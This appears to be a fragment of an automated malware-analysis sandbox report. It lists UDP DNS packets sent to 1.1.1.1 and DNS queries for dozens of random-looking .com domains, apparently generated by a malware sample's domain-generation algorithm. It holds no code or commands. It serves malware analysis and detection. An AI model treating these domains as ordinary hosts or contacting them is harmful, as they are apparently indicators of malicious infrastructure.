                                                                                                                                                                                                              Nov 11, 2024 18:34:15.714593887 CET5325153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.714970112 CET6471453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.715399027 CET6271753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725070000 CET53627171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725409985 CET53532511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.725419998 CET53642501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:15.746262074 CET53647141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.079075098 CET6173053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.084775925 CET5217753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.091438055 CET5628353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.091842890 CET4981853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.092205048 CET5210253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.092452049 CET5772553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102197886 CET53521021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102468967 CET53577251.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102480888 CET53498181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.102490902 CET53521771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.104803085 CET53562831.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.111387014 CET53617301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.429385900 CET6296353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.429760933 CET5705553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.430373907 CET6195553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435157061 CET5534753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435189009 CET5234353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435658932 CET6031553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.435761929 CET5290753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.439023972 CET6019153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.439533949 CET6377253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440197945 CET53570551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.440316916 CET53629631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441364050 CET5172053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441397905 CET6034653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.441823006 CET5507053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.442248106 CET5018453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.443013906 CET5259653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.444266081 CET53523431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.445005894 CET53553471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.447192907 CET53603151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.447999954 CET6203453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451675892 CET53517201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451685905 CET53637721.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451697111 CET53603461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.451708078 CET53550701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.452982903 CET53501841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.454585075 CET53525961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.456149101 CET6005853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.456224918 CET6156753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.457623005 CET4922353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.462398052 CET53619551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.464351892 CET5934753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466084957 CET53615671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466135025 CET53600581.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.466145039 CET6237953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468462944 CET5901253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468775988 CET6395353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.468974113 CET6272753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469567060 CET53529071.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.469772100 CET53601911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474081993 CET5396453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474641085 CET5700853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.474808931 CET53593471.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.476383924 CET53623791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.478765011 CET5417553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.479724884 CET5201153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480489969 CET53627271.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.480940104 CET53620341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.482877016 CET5291953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.484563112 CET5517953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.484596968 CET5828653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.485008955 CET53539641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.485433102 CET5773253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.486440897 CET5210053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.486916065 CET6014853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.488934994 CET53570081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.490031004 CET53492231.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.491684914 CET53582861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.493402004 CET53529191.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.494117975 CET53521001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.494692087 CET53551791.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.495079994 CET53577321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.500103951 CET53590121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.500638962 CET53639531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.510565042 CET53541751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.511639118 CET53520111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.519366980 CET53601481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528667927 CET6454153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528930902 CET6359653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.528932095 CET5392053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529134035 CET6505653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529310942 CET5195353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.529505968 CET5259353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.538913965 CET53539201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.540447950 CET53645411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.549189091 CET5515953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.560602903 CET53519531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561669111 CET53635961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561678886 CET53525931.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.561688900 CET53650561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:34:16.567222118 CET53551591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.373328924 CET5829253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.373328924 CET6215353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.374526978 CET6178953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.375560999 CET5300653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.376579046 CET6244653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.378079891 CET5463053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.381304026 CET5603653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.381304026 CET5261453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.384951115 CET53582921.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.386641026 CET53617891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.388901949 CET53546301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.392066956 CET53526141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.395006895 CET5661353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.396436930 CET6277353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.396692991 CET6383253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.397250891 CET5618653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.397588968 CET5049053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398121119 CET5373853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398709059 CET5412153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398709059 CET5003453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.399136066 CET5616553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400281906 CET5672653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400281906 CET5602253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400504112 CET6388053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401182890 CET5369653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401182890 CET6224653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401927948 CET5943053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401928902 CET6031253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.402533054 CET4941753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.402764082 CET6170453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.403146982 CET5387153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.403408051 CET6020453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404009104 CET6268953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404125929 CET6155653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404757977 CET5237553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.404992104 CET5711853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.405450106 CET6074453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406011105 CET6469953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406011105 CET6304153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406598091 CET5139853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.406598091 CET5242253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.407211065 CET5478953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.407759905 CET5470853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.408437967 CET5463153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409835100 CET53621531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409847021 CET53627731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409856081 CET53624461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409864902 CET53561861.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409873962 CET53541211.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.411968946 CET53560221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412007093 CET53561651.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412019968 CET53622461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.412029028 CET53567261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413340092 CET53500341.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413490057 CET53638801.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.413499117 CET53523751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.414829016 CET53615561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417074919 CET53594301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417087078 CET53602041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417524099 CET53494171.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.417546988 CET53547891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.418284893 CET53547081.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.419034004 CET53630411.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.420028925 CET53538711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.428397894 CET6415953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.434709072 CET6547653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435902119 CET5314553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.435951948 CET53617041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.436619997 CET53536961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438374043 CET53513981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.438750982 CET53571181.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.439928055 CET53641591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.441051960 CET53607441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.442678928 CET5260353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.443820000 CET53654761.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.444122076 CET53546311.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445930004 CET53531451.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.445956945 CET6240053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.447927952 CET5029753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET5757153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.454739094 CET5963053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.456435919 CET5084853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.459563971 CET6174453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.459563971 CET6378453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.460438967 CET6385753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.462922096 CET5186953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.462922096 CET6431553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.463291883 CET6327553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.463651896 CET5769753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.464550018 CET53596301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.466969013 CET6535653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.466969013 CET6274953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.467242002 CET6376853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.467536926 CET5997053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468502045 CET5992453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468847990 CET53637841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468852997 CET5126153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.468972921 CET5745353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.469321966 CET6160553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.471777916 CET53638571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473299026 CET53632751.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473953962 CET53518691.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.473965883 CET53576971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.476046085 CET53526031.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.476298094 CET53574531.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478282928 CET53624001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478434086 CET53512611.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478611946 CET53502971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.478790998 CET53599241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.479163885 CET53599701.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.486980915 CET53575711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.487101078 CET53508481.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.491020918 CET53637681.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.491050959 CET53617441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.495290041 CET53643151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.497071981 CET53627491.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.498925924 CET53653561.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.502402067 CET53616051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.530900955 CET53504901.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.567688942 CET53530061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.592545986 CET53560361.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.593472958 CET53566131.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.598146915 CET53537381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.605355978 CET53524221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.622581959 CET53603121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.625165939 CET53626891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.646377087 CET53638321.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.103965044 CET5371253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.137005091 CET53537121.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.397430897 CET6469953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.333369017 CET53646991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.333395004 CET53646991.1.1.1192.168.2.8

                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.929912090 CET192.168.2.81.1.1.10x5b81Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.930818081 CET192.168.2.81.1.1.10x70ebStandard query (0)lyvyxor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.933923006 CET192.168.2.81.1.1.10xce8cStandard query (0)vojyqem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.936716080 CET192.168.2.81.1.1.10x81c7Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.948138952 CET192.168.2.81.1.1.10xf481Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.949507952 CET192.168.2.81.1.1.10x5503Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.949799061 CET192.168.2.81.1.1.10x7904Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.950511932 CET192.168.2.81.1.1.10xd825Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.961102962 CET192.168.2.81.1.1.10xf2b6Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.961329937 CET192.168.2.81.1.1.10xd129Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.992372036 CET192.168.2.81.1.1.10x24d1Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:07.992475986 CET192.168.2.81.1.1.10x65bStandard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.023690939 CET192.168.2.81.1.1.10xfe10Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.023819923 CET192.168.2.81.1.1.10x1f1cStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.054802895 CET192.168.2.81.1.1.10x230Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.056328058 CET192.168.2.81.1.1.10x49f8Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.057821035 CET192.168.2.81.1.1.10x346cStandard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.059511900 CET192.168.2.81.1.1.10xb3efStandard query (0)gahyqah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.061314106 CET192.168.2.81.1.1.10x37f6Standard query (0)vonypom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.063124895 CET192.168.2.81.1.1.10x719dStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.064548969 CET192.168.2.81.1.1.10x2553Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.065979004 CET192.168.2.81.1.1.10xbffaStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.067379951 CET192.168.2.81.1.1.10x7a7bStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.068813086 CET192.168.2.81.1.1.10xcedbStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.070785999 CET192.168.2.81.1.1.10xf2f3Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086119890 CET192.168.2.81.1.1.10xb772Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086119890 CET192.168.2.81.1.1.10xfe69Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086999893 CET192.168.2.81.1.1.10x6177Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.087753057 CET192.168.2.81.1.1.10xe306Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.101707935 CET192.168.2.81.1.1.10x9f1cStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.101799011 CET192.168.2.81.1.1.10x8ab5Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.132994890 CET192.168.2.81.1.1.10x3deaStandard query (0)gatyfus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.133053064 CET192.168.2.81.1.1.10x46b0Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.164566040 CET192.168.2.81.1.1.10xbf5bStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404130936 CET192.168.2.81.1.1.10xbbcbStandard query (0)galykes.comA (IP address)IN (0x0001)false
